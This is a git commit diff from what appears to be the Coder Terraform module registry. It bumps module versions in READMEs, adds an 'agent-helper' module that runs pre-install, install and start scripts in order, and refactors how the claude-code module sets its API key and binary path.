chore: bun fmt

- Added a function to wait for the VS Code Web server to be ready before proceeding with the installation of extensions.
- Replaced sleep commands with a conditional wait to ensure extensions are only installed after the server is confirmed to be running.

.github/workflows/version-bump.yaml

@@ -41,7 +41,7 @@ jobs:
           LABEL_NAME: ${{ github.event.label.name }}
         id: bump-type
         run: |
-          case "$LABEL_NAME" in in
+          case "$LABEL_NAME" in
             "version:patch")
               echo "type=patch" >> $GITHUB_OUTPUT
               ;;

registry/coder-labs/modules/codex/README.md

@@ -13,7 +13,7 @@ Run Codex CLI in your workspace to access OpenAI's models through the Codex inte
 ```tf
 module "codex" {
   source         = "registry.coder.com/coder-labs/codex/coder"
-  version        = "4.1.0"
+  version        = "4.1.1"
   agent_id       = coder_agent.example.id
   openai_api_key = var.openai_api_key
   workdir        = "/home/coder/project"
@@ -32,7 +32,7 @@ module "codex" {
 module "codex" {
   count          = data.coder_workspace.me.start_count
   source         = "registry.coder.com/coder-labs/codex/coder"
-  version        = "4.1.0"
+  version        = "4.1.1"
   agent_id       = coder_agent.example.id
   openai_api_key = "..."
   workdir        = "/home/coder/project"
@@ -51,7 +51,7 @@ For tasks integration with AI Bridge, add `enable_aibridge = true` to the [Usage
 ```tf
 module "codex" {
   source          = "registry.coder.com/coder-labs/codex/coder"
-  version         = "4.1.0"
+  version         = "4.1.1"
   agent_id        = coder_agent.example.id
   workdir         = "/home/coder/project"
   enable_aibridge = true
@@ -94,7 +94,7 @@ data "coder_task" "me" {}
 
 module "codex" {
   source         = "registry.coder.com/coder-labs/codex/coder"
-  version        = "4.1.0"
+  version        = "4.1.1"
   agent_id       = coder_agent.example.id
   openai_api_key = "..."
   ai_prompt      = data.coder_task.me.prompt
@@ -112,7 +112,7 @@ This example shows additional configuration options for custom models, MCP serve
 ```tf
 module "codex" {
   source         = "registry.coder.com/coder-labs/codex/coder"
-  version        = "4.1.0"
+  version        = "4.1.1"
   agent_id       = coder_agent.example.id
   openai_api_key = "..."
   workdir        = "/home/coder/project"

registry/coder-labs/modules/codex/main.tf

@@ -131,7 +131,7 @@ variable "install_agentapi" {
 variable "agentapi_version" {
   type        = string
   description = "The version of AgentAPI to install."
-  default     = "v0.11.6"
+  default     = "v0.11.8"
 }
 
 variable "codex_model" {

registry/coder-labs/modules/nextflow/README.md

@@ -10,8 +10,6 @@ tags: [nextflow, workflow, hpc, bioinformatics]
 
 A module that adds Nextflow to your Coder template.
 
-![Nextflow](../../.images/nextflow.png)
-
 ```tf
 module "nextflow" {
   count    = data.coder_workspace.me.start_count

registry/coder/modules/agent-helper/README.md

@@ -0,0 +1,65 @@
+---
+display_name: Agent Helper
+description: Building block for modules that need orchestrated script execution
+icon: ../../../../.icons/coder.svg
+verified: false
+tags: [internal, library]
+---
+
+# Agent Helper
+
+> [!CAUTION]
+> We do not recommend using this module directly. It is intended primarily for internal use by Coder to create modules with orchestrated script execution.
+
+The Agent Helper module is a building block for modules that need to run multiple scripts in a specific order. It uses `coder exp sync` for dependency management and is designed for orchestrating pre-install, install, post-install, and start scripts.
+
+> [!NOTE]
+>
+> - The `agent_name` should be the same as that of the agentapi module's `agent_name` if used together.
+
+```tf
+module "agent_helper" {
+  source  = "registry.coder.com/coder/agent-helper/coder"
+  version = "1.0.0"
+
+  agent_id        = coder_agent.main.id
+  agent_name      = "myagent"
+  module_dir_name = ".my-module"
+
+  pre_install_script = <<-EOT
+    #!/bin/bash
+    echo "Running pre-install tasks..."
+    # Your pre-install logic here
+  EOT
+
+  install_script = <<-EOT
+    #!/bin/bash
+    echo "Installing dependencies..."
+    # Your install logic here
+  EOT
+
+  post_install_script = <<-EOT
+    #!/bin/bash
+    echo "Running post-install configuration..."
+    # Your post-install logic here
+  EOT
+
+  start_script = <<-EOT
+    #!/bin/bash
+    echo "Starting the application..."
+    # Your start logic here
+  EOT
+}
+```
+
+## Execution Order
+
+The module orchestrates scripts in the following order:
+
+1. **Log File Creation** - Creates module directory and log files
+2. **Pre-Install Script** (optional) - Runs before installation
+3. **Install Script** - Main installation
+4. **Post-Install Script** (optional) - Runs after installation
+5. **Start Script** - Starts the application
+
+Each script waits for its prerequisites to complete before running using `coder exp sync` dependency management.

registry/coder/modules/agent-helper/main.test.ts

@@ -0,0 +1,13 @@
+import { describe } from "bun:test";
+import { runTerraformInit, testRequiredVariables } from "~test";
+
+describe("agent-helper", async () => {
+  await runTerraformInit(import.meta.dir);
+
+  testRequiredVariables(import.meta.dir, {
+    agent_id: "test-agent-id",
+    agent_name: "test-agent",
+    module_dir_name: ".test-module",
+    start_script: "echo 'start'",
+  });
+});

registry/coder/modules/agent-helper/main.tf

@@ -0,0 +1,190 @@
+terraform {
+  required_version = ">= 1.0"
+
+  required_providers {
+    coder = {
+      source  = "coder/coder"
+      version = ">= 2.13"
+    }
+  }
+}
+
+variable "agent_id" {
+  type        = string
+  description = "The ID of a Coder agent."
+}
+
+data "coder_workspace" "me" {}
+
+data "coder_workspace_owner" "me" {}
+
+data "coder_task" "me" {}
+
+variable "pre_install_script" {
+  type        = string
+  description = "Custom script to run before installing the agent used by AgentAPI."
+  default     = null
+}
+
+variable "install_script" {
+  type        = string
+  description = "Script to install the agent used by AgentAPI."
+  default     = null
+}
+
+variable "post_install_script" {
+  type        = string
+  description = "Custom script to run after installing the agent used by AgentAPI."
+  default     = null
+}
+
+variable "start_script" {
+  type        = string
+  description = "Script that starts AgentAPI."
+}
+
+variable "agent_name" {
+  type        = string
+  description = "The name of the agent. This is used to construct unique script names for the experiment sync."
+
+}
+
+variable "module_dir_name" {
+  type        = string
+  description = "The name of the module directory."
+}
+
+locals {
+  encoded_pre_install_script  = var.pre_install_script != null ? base64encode(var.pre_install_script) : ""
+  encoded_install_script      = var.install_script != null ? base64encode(var.install_script) : ""
+  encoded_post_install_script = var.post_install_script != null ? base64encode(var.post_install_script) : ""
+  encoded_start_script        = base64encode(var.start_script)
+
+  pre_install_script_name  = "${var.agent_name}-pre_install_script"
+  install_script_name      = "${var.agent_name}-install_script"
+  post_install_script_name = "${var.agent_name}-post_install_script"
+  start_script_name        = "${var.agent_name}-start_script"
+
+  module_dir_path = "$HOME/${var.module_dir_name}"
+
+  pre_install_path  = "${local.module_dir_path}/pre_install.sh"
+  install_path      = "${local.module_dir_path}/install.sh"
+  post_install_path = "${local.module_dir_path}/post_install.sh"
+  start_path        = "${local.module_dir_path}/start.sh"
+
+  pre_install_log_path  = "${local.module_dir_path}/pre_install.log"
+  install_log_path      = "${local.module_dir_path}/install.log"
+  post_install_log_path = "${local.module_dir_path}/post_install.log"
+  start_log_path        = "${local.module_dir_path}/start.log"
+}
+
+resource "coder_script" "pre_install_script" {
+  count        = var.pre_install_script == null ? 0 : 1
+  agent_id     = var.agent_id
+  display_name = "Pre-Install Script"
+  run_on_start = true
+  script       = <<-EOT
+    #!/bin/bash
+    set -o errexit
+    set -o pipefail
+
+    mkdir -p ${local.module_dir_path}
+
+    trap 'coder exp sync complete ${local.pre_install_script_name}' EXIT
+    coder exp sync start ${local.pre_install_script_name}
+
+    echo -n '${local.encoded_pre_install_script}' | base64 -d > ${local.pre_install_path}
+    chmod +x ${local.pre_install_path}
+
+    ${local.pre_install_path} > ${local.pre_install_log_path} 2>&1
+  EOT
+}
+
+resource "coder_script" "install_script" {
+  agent_id     = var.agent_id
+  display_name = "Install Script"
+  run_on_start = true
+  script       = <<-EOT
+    #!/bin/bash
+    set -o errexit
+    set -o pipefail
+
+    mkdir -p ${local.module_dir_path}
+
+    trap 'coder exp sync complete ${local.install_script_name}' EXIT
+    %{if var.pre_install_script != null~}
+      coder exp sync want ${local.install_script_name} ${local.pre_install_script_name}
+    %{endif~}
+    coder exp sync start ${local.install_script_name}
+    echo -n '${local.encoded_install_script}' | base64 -d > ${local.install_path}
+    chmod +x ${local.install_path}
+
+    ${local.install_path} > ${local.install_log_path} 2>&1
+  EOT
+}
+
+resource "coder_script" "post_install_script" {
+  count        = var.post_install_script != null ? 1 : 0
+  agent_id     = var.agent_id
+  display_name = "Post-Install Script"
+  run_on_start = true
+  script       = <<-EOT
+    #!/bin/bash
+    set -o errexit
+    set -o pipefail
+
+    trap 'coder exp sync complete ${local.post_install_script_name}' EXIT
+    coder exp sync want ${local.post_install_script_name} ${local.install_script_name}
+    coder exp sync start ${local.post_install_script_name}
+
+    echo -n '${local.encoded_post_install_script}' | base64 -d > ${local.post_install_path}
+    chmod +x ${local.post_install_path}
+
+    ${local.post_install_path} > ${local.post_install_log_path} 2>&1
+  EOT
+}
+
+resource "coder_script" "start_script" {
+  agent_id     = var.agent_id
+  display_name = "Start Script"
+  run_on_start = true
+  script       = <<-EOT
+    #!/bin/bash
+    set -o errexit
+    set -o pipefail
+
+    trap 'coder exp sync complete ${local.start_script_name}' EXIT
+
+    %{if var.post_install_script != null~}
+    coder exp sync want ${local.start_script_name} ${local.install_script_name} ${local.post_install_script_name}
+    %{else~}
+    coder exp sync want ${local.start_script_name} ${local.install_script_name}
+    %{endif~}
+    coder exp sync start ${local.start_script_name}
+
+    echo -n '${local.encoded_start_script}' | base64 -d > ${local.start_path}
+    chmod +x ${local.start_path}
+
+    ${local.start_path} > ${local.start_log_path} 2>&1
+  EOT
+}
+
+output "pre_install_script_name" {
+  description = "The name of the pre-install script for sync."
+  value       = local.pre_install_script_name
+}
+
+output "install_script_name" {
+  description = "The name of the install script for sync."
+  value       = local.install_script_name
+}
+
+output "post_install_script_name" {
+  description = "The name of the post-install script for sync."
+  value       = local.post_install_script_name
+}
+
+output "start_script_name" {
+  description = "The name of the start script for sync."
+  value       = local.start_script_name
+}

registry/coder/modules/agent-helper/main.tftest.hcl

@@ -0,0 +1,271 @@
+# Test for agent-helper module
+
+# Test with all scripts provided
+run "test_with_all_scripts" {
+  command = plan
+
+  variables {
+    agent_id            = "test-agent-id"
+    agent_name          = "test-agent"
+    module_dir_name     = ".test-module"
+    pre_install_script  = "echo 'pre-install'"
+    install_script      = "echo 'install'"
+    post_install_script = "echo 'post-install'"
+    start_script        = "echo 'start'"
+  }
+
+  # Verify pre_install_script is created when provided
+  assert {
+    condition     = length(coder_script.pre_install_script) == 1
+    error_message = "Pre-install script should be created when pre_install_script is provided"
+  }
+
+  assert {
+    condition     = coder_script.pre_install_script[0].agent_id == "test-agent-id"
+    error_message = "Pre-install script agent ID should match input"
+  }
+
+  assert {
+    condition     = coder_script.pre_install_script[0].display_name == "Pre-Install Script"
+    error_message = "Pre-install script should have correct display name"
+  }
+
+  assert {
+    condition     = coder_script.pre_install_script[0].run_on_start == true
+    error_message = "Pre-install script should run on start"
+  }
+
+  # Verify install_script is created
+  assert {
+    condition     = coder_script.install_script.agent_id == "test-agent-id"
+    error_message = "Install script agent ID should match input"
+  }
+
+  assert {
+    condition     = coder_script.install_script.display_name == "Install Script"
+    error_message = "Install script should have correct display name"
+  }
+
+  assert {
+    condition     = coder_script.install_script.run_on_start == true
+    error_message = "Install script should run on start"
+  }
+
+  # Verify post_install_script is created when provided
+  assert {
+    condition     = length(coder_script.post_install_script) == 1
+    error_message = "Post-install script should be created when post_install_script is provided"
+  }
+
+  assert {
+    condition     = coder_script.post_install_script[0].agent_id == "test-agent-id"
+    error_message = "Post-install script agent ID should match input"
+  }
+
+  assert {
+    condition     = coder_script.post_install_script[0].display_name == "Post-Install Script"
+    error_message = "Post-install script should have correct display name"
+  }
+
+  assert {
+    condition     = coder_script.post_install_script[0].run_on_start == true
+    error_message = "Post-install script should run on start"
+  }
+
+  # Verify start_script is created
+  assert {
+    condition     = coder_script.start_script.agent_id == "test-agent-id"
+    error_message = "Start script agent ID should match input"
+  }
+
+  assert {
+    condition     = coder_script.start_script.display_name == "Start Script"
+    error_message = "Start script should have correct display name"
+  }
+
+  assert {
+    condition     = coder_script.start_script.run_on_start == true
+    error_message = "Start script should run on start"
+  }
+
+  # Verify outputs for script names
+  assert {
+    condition     = output.pre_install_script_name == "test-agent-pre_install_script"
+    error_message = "Pre-install script name output should be correctly formatted"
+  }
+
+  assert {
+    condition     = output.install_script_name == "test-agent-install_script"
+    error_message = "Install script name output should be correctly formatted"
+  }
+
+  assert {
+    condition     = output.post_install_script_name == "test-agent-post_install_script"
+    error_message = "Post-install script name output should be correctly formatted"
+  }
+
+  assert {
+    condition     = output.start_script_name == "test-agent-start_script"
+    error_message = "Start script name output should be correctly formatted"
+  }
+}
+
+# Test with only required scripts (no pre/post install)
+run "test_without_optional_scripts" {
+  command = plan
+
+  variables {
+    agent_id        = "test-agent-id"
+    agent_name      = "test-agent"
+    module_dir_name = ".test-module"
+    install_script  = "echo 'install'"
+    start_script    = "echo 'start'"
+  }
+
+  # Verify pre_install_script is NOT created when not provided
+  assert {
+    condition     = length(coder_script.pre_install_script) == 0
+    error_message = "Pre-install script should not be created when pre_install_script is null"
+  }
+
+  # Verify post_install_script is NOT created when not provided
+  assert {
+    condition     = length(coder_script.post_install_script) == 0
+    error_message = "Post-install script should not be created when post_install_script is null"
+  }
+
+  # Verify required scripts are still created
+  assert {
+    condition     = coder_script.install_script.agent_id == "test-agent-id"
+    error_message = "Install script should be created"
+  }
+
+  assert {
+    condition     = coder_script.start_script.agent_id == "test-agent-id"
+    error_message = "Start script should be created"
+  }
+
+  # Verify outputs
+  assert {
+    condition     = output.pre_install_script_name == "test-agent-pre_install_script"
+    error_message = "Pre-install script name output should be generated even when script is not created"
+  }
+
+  assert {
+    condition     = output.install_script_name == "test-agent-install_script"
+    error_message = "Install script name output should be correctly formatted"
+  }
+
+  assert {
+    condition     = output.post_install_script_name == "test-agent-post_install_script"
+    error_message = "Post-install script name output should be generated even when script is not created"
+  }
+
+  assert {
+    condition     = output.start_script_name == "test-agent-start_script"
+    error_message = "Start script name output should be correctly formatted"
+  }
+}
+
+# Test with mock data sources
+run "test_with_mock_data" {
+  command = plan
+
+  variables {
+    agent_id        = "mock-agent"
+    agent_name      = "mock-agent"
+    module_dir_name = ".mock-module"
+    install_script  = "echo 'install'"
+    start_script    = "echo 'start'"
+  }
+
+  # Mock the data sources for testing
+  override_data {
+    target = data.coder_workspace.me
+    values = {
+      id            = "test-workspace-id"
+      name          = "test-workspace"
+      owner         = "test-owner"
+      owner_id      = "test-owner-id"
+      template_id   = "test-template-id"
+      template_name = "test-template"
+      access_url    = "https://coder.example.com"
+      start_count   = 1
+      transition    = "start"
+    }
+  }
+
+  override_data {
+    target = data.coder_workspace_owner.me
+    values = {
+      id            = "test-owner-id"
+      email         = "test@example.com"
+      name          = "Test User"
+      session_token = "mock-token"
+    }
+  }
+
+  override_data {
+    target = data.coder_task.me
+    values = {
+      id = "test-task-id"
+    }
+  }
+
+  # Verify scripts are created with mocked data
+  assert {
+    condition     = coder_script.install_script.agent_id == "mock-agent"
+    error_message = "Install script should use the mocked agent ID"
+  }
+
+  assert {
+    condition     = coder_script.start_script.agent_id == "mock-agent"
+    error_message = "Start script should use the mocked agent ID"
+  }
+}
+
+# Test script naming with custom agent_name
+run "test_script_naming" {
+  command = plan
+
+  variables {
+    agent_id        = "test-agent"
+    agent_name      = "custom-name"
+    module_dir_name = ".test-module"
+    install_script  = "echo 'install'"
+    start_script    = "echo 'start'"
+  }
+
+  # Verify script names are constructed correctly
+  # The script should contain references to custom-name-* in the sync commands
+  assert {
+    condition     = can(regex("custom-name-install_script", coder_script.install_script.script))
+    error_message = "Install script should use custom agent_name in sync commands"
+  }
+
+  assert {
+    condition     = can(regex("custom-name-start_script", coder_script.start_script.script))
+    error_message = "Start script should use custom agent_name in sync commands"
+  }
+
+  # Verify outputs use custom agent_name
+  assert {
+    condition     = output.pre_install_script_name == "custom-name-pre_install_script"
+    error_message = "Pre-install script name output should use custom agent_name"
+  }
+
+  assert {
+    condition     = output.install_script_name == "custom-name-install_script"
+    error_message = "Install script name output should use custom agent_name"
+  }
+
+  assert {
+    condition     = output.post_install_script_name == "custom-name-post_install_script"
+    error_message = "Post-install script name output should use custom agent_name"
+  }
+
+  assert {
+    condition     = output.start_script_name == "custom-name-start_script"
+    error_message = "Start script name output should use custom agent_name"
+  }
+}

registry/coder/modules/agentapi/README.md

@@ -16,7 +16,7 @@ The AgentAPI module is a building block for modules that need to run an AgentAPI
 ```tf
 module "agentapi" {
   source  = "registry.coder.com/coder/agentapi/coder"
-  version = "2.1.0"
+  version = "2.1.1"
 
   agent_id             = var.agent_id
   web_app_slug         = local.app_slug

registry/coder/modules/agentapi/scripts/agentapi-wait-for-start.sh

@@ -3,20 +3,22 @@ set -o errexit
 set -o pipefail
 
 port=${1:-3284}
+max_attempts=150
 
-# This script waits for the agentapi server to start on port 3284.
+# This script waits for the agentapi server to start on the given port.
+# Each attempt sleeps 0.1s, so 150 attempts ≈ 15 seconds.
 # It considers the server started after 3 consecutive successful responses.
 
 agentapi_started=false
 
 echo "Waiting for agentapi server to start on port $port..."
-for i in $(seq 1 150); do
+for i in $(seq 1 "$max_attempts"); do
   for j in $(seq 1 3); do
     sleep 0.1
     if curl -fs -o /dev/null "http://localhost:$port/status"; then
       echo "agentapi response received ($j/3)"
     else
-      echo "agentapi server not responding ($i/15)"
+      echo "agentapi server not responding ($i/$max_attempts)"
       continue 2
     fi
   done
@@ -25,7 +27,7 @@ for i in $(seq 1 150); do
 done
 
 if [ "$agentapi_started" != "true" ]; then
-  echo "Error: agentapi server did not start on port $port after 15 seconds."
+  echo "Error: agentapi server did not start on port $port after $max_attempts attempts."
   exit 1
 fi
 

registry/coder/modules/antigravity/README.md

@@ -16,7 +16,7 @@ Uses the [Coder Remote VS Code Extension](https://github.com/coder/vscode-coder)
 module "antigravity" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/antigravity/coder"
-  version  = "1.0.0"
+  version  = "1.0.1"
   agent_id = coder_agent.example.id
 }
 ```
@@ -29,7 +29,7 @@ module "antigravity" {
 module "antigravity" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/antigravity/coder"
-  version  = "1.0.0"
+  version  = "1.0.1"
   agent_id = coder_agent.example.id
   folder   = "/home/coder/project"
 }
@@ -45,7 +45,7 @@ The following example configures Antigravity to use the GitHub MCP server with a
 module "antigravity" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/antigravity/coder"
-  version  = "1.0.0"
+  version  = "1.0.1"
   agent_id = coder_agent.example.id
   folder   = "/home/coder/project"
   mcp = jsonencode({

registry/coder/modules/antigravity/main.tf

@@ -66,15 +66,15 @@ locals {
 
 module "vscode-desktop-core" {
   source  = "registry.coder.com/coder/vscode-desktop-core/coder"
-  version = "1.0.1"
+  version = "1.0.2"
 
   agent_id = var.agent_id
 
-  web_app_icon         = "/icon/antigravity.svg"
-  web_app_slug         = var.slug
-  web_app_display_name = var.display_name
-  web_app_order        = var.order
-  web_app_group        = var.group
+  coder_app_icon         = "/icon/antigravity.svg"
+  coder_app_slug         = var.slug
+  coder_app_display_name = var.display_name
+  coder_app_order        = var.order
+  coder_app_group        = var.group
 
   folder      = var.folder
   open_recent = var.open_recent

registry/coder/modules/claude-code/README.md

@@ -13,7 +13,7 @@ Run the [Claude Code](https://docs.anthropic.com/en/docs/agents-and-tools/claude
 ```tf
 module "claude-code" {
   source         = "registry.coder.com/coder/claude-code/coder"
-  version        = "4.7.1"
+  version        = "4.7.5"
   agent_id       = coder_agent.main.id
   workdir        = "/home/coder/project"
   claude_api_key = "xxxx-xxxxx-xxxx"
@@ -47,7 +47,7 @@ By default, when `enable_boundary = true`, the module uses `coder boundary` subc
 ```tf
 module "claude-code" {
   source          = "registry.coder.com/coder/claude-code/coder"
-  version         = "4.7.1"
+  version         = "4.7.5"
   agent_id        = coder_agent.main.id
   workdir         = "/home/coder/project"
   enable_boundary = true
@@ -59,7 +59,7 @@ module "claude-code" {
 
 ### Usage with AI Bridge
 
-[AI Bridge](https://coder.com/docs/ai-coder/ai-bridge) is a Premium Coder feature that provides centralized LLM proxy management. To use AI Bridge, set `enable_aibridge = true`.
+[AI Bridge](https://coder.com/docs/ai-coder/ai-bridge) is a Premium Coder feature that provides centralized LLM proxy management. To use AI Bridge, set `enable_aibridge = true`. Requires Coder version >= 2.29.0.
 
 For tasks integration with AI Bridge, add `enable_aibridge = true` to the [Usage with Tasks](#usage-with-tasks) example below.
 
@@ -68,7 +68,7 @@ For tasks integration with AI Bridge, add `enable_aibridge = true` to the [Usage
 ```tf
 module "claude-code" {
   source          = "registry.coder.com/coder/claude-code/coder"
-  version         = "4.7.1"
+  version         = "4.7.5"
   agent_id        = coder_agent.main.id
   workdir         = "/home/coder/project"
   enable_aibridge = true
@@ -96,12 +96,11 @@ resource "coder_ai_task" "task" {
 data "coder_task" "me" {}
 
 module "claude-code" {
-  source         = "registry.coder.com/coder/claude-code/coder"
-  version        = "4.7.1"
-  agent_id       = coder_agent.main.id
-  workdir        = "/home/coder/project"
-  claude_api_key = "xxxx-xxxxx-xxxx"
-  ai_prompt      = data.coder_task.me.prompt
+  source    = "registry.coder.com/coder/claude-code/coder"
+  version   = "4.7.5"
+  agent_id  = coder_agent.main.id
+  workdir   = "/home/coder/project"
+  ai_prompt = data.coder_task.me.prompt
 
   # Optional: route through AI Bridge (Premium feature)
   # enable_aibridge = true
@@ -121,7 +120,7 @@ This example shows additional configuration options for version pinning, custom
 ```tf
 module "claude-code" {
   source   = "registry.coder.com/coder/claude-code/coder"
-  version  = "4.7.1"
+  version  = "4.7.5"
   agent_id = coder_agent.main.id
   workdir  = "/home/coder/project"
 
@@ -177,7 +176,7 @@ Run and configure Claude Code as a standalone CLI in your workspace.
 ```tf
 module "claude-code" {
   source              = "registry.coder.com/coder/claude-code/coder"
-  version             = "4.7.1"
+  version             = "4.7.5"
   agent_id            = coder_agent.main.id
   workdir             = "/home/coder/project"
   install_claude_code = true
@@ -199,7 +198,7 @@ variable "claude_code_oauth_token" {
 
 module "claude-code" {
   source                  = "registry.coder.com/coder/claude-code/coder"
-  version                 = "4.7.1"
+  version                 = "4.7.5"
   agent_id                = coder_agent.main.id
   workdir                 = "/home/coder/project"
   claude_code_oauth_token = var.claude_code_oauth_token
@@ -210,7 +209,7 @@ module "claude-code" {
 
 #### Prerequisites
 
-AWS account with Bedrock access, Claude models enabled in Bedrock console, appropriate IAM permissions.
+AWS account with Bedrock access, Claude models enabled in Bedrock console, and appropriate IAM permissions.
 
 Configure Claude Code to use AWS Bedrock for accessing Claude models through your AWS infrastructure.
 
@@ -272,7 +271,7 @@ resource "coder_env" "bedrock_api_key" {
 
 module "claude-code" {
   source   = "registry.coder.com/coder/claude-code/coder"
-  version  = "4.7.1"
+  version  = "4.7.5"
   agent_id = coder_agent.main.id
   workdir  = "/home/coder/project"
   model    = "global.anthropic.claude-sonnet-4-5-20250929-v1:0"
@@ -286,7 +285,7 @@ module "claude-code" {
 
 #### Prerequisites
 
-GCP project with Vertex AI API enabled, Claude models enabled through Model Garden, service account with Vertex AI permissions, appropriate IAM permissions (Vertex AI User role).
+GCP project with Vertex AI API enabled, Claude models enabled through Model Garden, service account with Vertex AI permissions, and appropriate IAM permissions (Vertex AI User role).
 
 Configure Claude Code to use Google Vertex AI for accessing Claude models through Google Cloud Platform.
 
@@ -329,7 +328,7 @@ resource "coder_env" "google_application_credentials" {
 
 module "claude-code" {
   source   = "registry.coder.com/coder/claude-code/coder"
-  version  = "4.7.1"
+  version  = "4.7.5"
   agent_id = coder_agent.main.id
   workdir  = "/home/coder/project"
   model    = "claude-sonnet-4@20250514"

registry/coder/modules/claude-code/main.tf

@@ -1,5 +1,5 @@
 terraform {
-  required_version = ">= 1.0"
+  required_version = ">= 1.9"
 
   required_providers {
     coder = {
@@ -208,6 +208,11 @@ variable "claude_binary_path" {
   type        = string
   description = "Directory where the Claude Code binary is located. Use this if Claude is pre-installed or installed outside the module to a non-default location."
   default     = "$HOME/.local/bin"
+
+  validation {
+    condition     = var.claude_binary_path == "$HOME/.local/bin" || !var.install_claude_code
+    error_message = "Custom claude_binary_path can only be used when install_claude_code is false. The official installer always installs to $HOME/.local/bin and does not support custom paths."
+  }
 }
 
 variable "install_via_npm" {
@@ -276,9 +281,11 @@ resource "coder_env" "claude_code_oauth_token" {
 }
 
 resource "coder_env" "claude_api_key" {
+  count = local.claude_api_key != "" ? 1 : 0
+
   agent_id = var.agent_id
   name     = "CLAUDE_API_KEY"
-  value    = var.enable_aibridge ? data.coder_workspace_owner.me.session_token : var.claude_api_key
+  value    = local.claude_api_key
 }
 
 resource "coder_env" "disable_autoupdater" {
@@ -288,18 +295,6 @@ resource "coder_env" "disable_autoupdater" {
   value    = "1"
 }
 
-resource "coder_env" "claude_binary_path" {
-  agent_id = var.agent_id
-  name     = "PATH"
-  value    = "${var.claude_binary_path}:$PATH"
-
-  lifecycle {
-    precondition {
-      condition     = var.claude_binary_path == "$HOME/.local/bin" || !var.install_claude_code
-      error_message = "Custom claude_binary_path can only be used when install_claude_code is false. The official installer and npm both install to fixed locations."
-    }
-  }
-}
 
 resource "coder_env" "anthropic_model" {
   count    = var.model != "" ? 1 : 0
@@ -324,7 +319,8 @@ locals {
   start_script    = file("${path.module}/scripts/start.sh")
   module_dir_name = ".claude-module"
   # Extract hostname from access_url for boundary --allow flag
-  coder_host = replace(replace(data.coder_workspace.me.access_url, "https://", ""), "http://", "")
+  coder_host     = replace(replace(data.coder_workspace.me.access_url, "https://", ""), "http://", "")
+  claude_api_key = var.enable_aibridge ? data.coder_workspace_owner.me.session_token : var.claude_api_key
 
   # Required prompts for the module to properly report task status to Coder
   report_tasks_system_prompt = <<-EOT
@@ -379,26 +375,27 @@ module "agentapi" {
   pre_install_script   = var.pre_install_script
   post_install_script  = var.post_install_script
   start_script         = <<-EOT
-     #!/bin/bash
-     set -o errexit
-     set -o pipefail
-     echo -n '${base64encode(local.start_script)}' | base64 -d > /tmp/start.sh
-     chmod +x /tmp/start.sh
+    #!/bin/bash
+    set -o errexit
+    set -o pipefail
+    echo -n '${base64encode(local.start_script)}' | base64 -d > /tmp/start.sh
+    chmod +x /tmp/start.sh
 
-     ARG_RESUME_SESSION_ID='${var.resume_session_id}' \
-     ARG_CONTINUE='${var.continue}' \
-     ARG_DANGEROUSLY_SKIP_PERMISSIONS='${var.dangerously_skip_permissions}' \
-     ARG_PERMISSION_MODE='${var.permission_mode}' \
-     ARG_WORKDIR='${local.workdir}' \
-     ARG_AI_PROMPT='${base64encode(var.ai_prompt)}' \
-     ARG_REPORT_TASKS='${var.report_tasks}' \
-     ARG_ENABLE_BOUNDARY='${var.enable_boundary}' \
-     ARG_BOUNDARY_VERSION='${var.boundary_version}' \
-     ARG_COMPILE_FROM_SOURCE='${var.compile_boundary_from_source}' \
-     ARG_USE_BOUNDARY_DIRECTLY='${var.use_boundary_directly}' \
-     ARG_CODER_HOST='${local.coder_host}' \
-     /tmp/start.sh
-   EOT
+    ARG_RESUME_SESSION_ID='${var.resume_session_id}' \
+    ARG_CONTINUE='${var.continue}' \
+    ARG_DANGEROUSLY_SKIP_PERMISSIONS='${var.dangerously_skip_permissions}' \
+    ARG_PERMISSION_MODE='${var.permission_mode}' \
+    ARG_WORKDIR='${local.workdir}' \
+    ARG_AI_PROMPT='${base64encode(var.ai_prompt)}' \
+    ARG_REPORT_TASKS='${var.report_tasks}' \
+    ARG_ENABLE_BOUNDARY='${var.enable_boundary}' \
+    ARG_BOUNDARY_VERSION='${var.boundary_version}' \
+    ARG_COMPILE_FROM_SOURCE='${var.compile_boundary_from_source}' \
+    ARG_USE_BOUNDARY_DIRECTLY='${var.use_boundary_directly}' \
+    ARG_CODER_HOST='${local.coder_host}' \
+    ARG_CLAUDE_BINARY_PATH='${var.claude_binary_path}' \
+    /tmp/start.sh
+  EOT
 
   install_script = <<-EOT
     #!/bin/bash

registry/coder/modules/claude-code/main.tftest.hcl

@@ -42,7 +42,7 @@ run "test_claude_code_with_api_key" {
   }
 
   assert {
-    condition     = coder_env.claude_api_key.value == "test-api-key-123"
+    condition     = coder_env.claude_api_key[0].value == "test-api-key-123"
     error_message = "Claude API key value should match the input"
   }
 }
@@ -298,6 +298,13 @@ run "test_aibridge_enabled" {
     enable_aibridge = true
   }
 
+  override_data {
+    target = data.coder_workspace_owner.me
+    values = {
+      session_token = "mock-session-token"
+    }
+  }
+
   assert {
     condition     = var.enable_aibridge == true
     error_message = "AI Bridge should be enabled"
@@ -314,12 +321,12 @@ run "test_aibridge_enabled" {
   }
 
   assert {
-    condition     = coder_env.claude_api_key.name == "CLAUDE_API_KEY"
+    condition     = coder_env.claude_api_key[0].name == "CLAUDE_API_KEY"
     error_message = "CLAUDE_API_KEY environment variable should be set"
   }
 
   assert {
-    condition     = coder_env.claude_api_key.value == data.coder_workspace_owner.me.session_token
+    condition     = coder_env.claude_api_key[0].value == data.coder_workspace_owner.me.session_token
     error_message = "CLAUDE_API_KEY should use workspace owner's session token when aibridge is enabled"
   }
 }
@@ -370,7 +377,7 @@ run "test_aibridge_disabled_with_api_key" {
   }
 
   assert {
-    condition     = coder_env.claude_api_key.value == "test-api-key-xyz"
+    condition     = coder_env.claude_api_key[0].value == "test-api-key-xyz"
     error_message = "CLAUDE_API_KEY should use the provided API key when aibridge is disabled"
   }
 
@@ -379,3 +386,18 @@ run "test_aibridge_disabled_with_api_key" {
     error_message = "ANTHROPIC_BASE_URL should not be set when aibridge is disabled"
   }
 }
+
+run "test_no_api_key_no_env" {
+  command = plan
+
+  variables {
+    agent_id        = "test-agent-no-key"
+    workdir         = "/home/coder/test"
+    enable_aibridge = false
+  }
+
+  assert {
+    condition     = length(coder_env.claude_api_key) == 0
+    error_message = "CLAUDE_API_KEY should not be created when no API key is provided and aibridge is disabled"
+  }
+}

registry/coder/modules/claude-code/scripts/install.sh

@@ -12,6 +12,8 @@ ARG_CLAUDE_CODE_VERSION=${ARG_CLAUDE_CODE_VERSION:-}
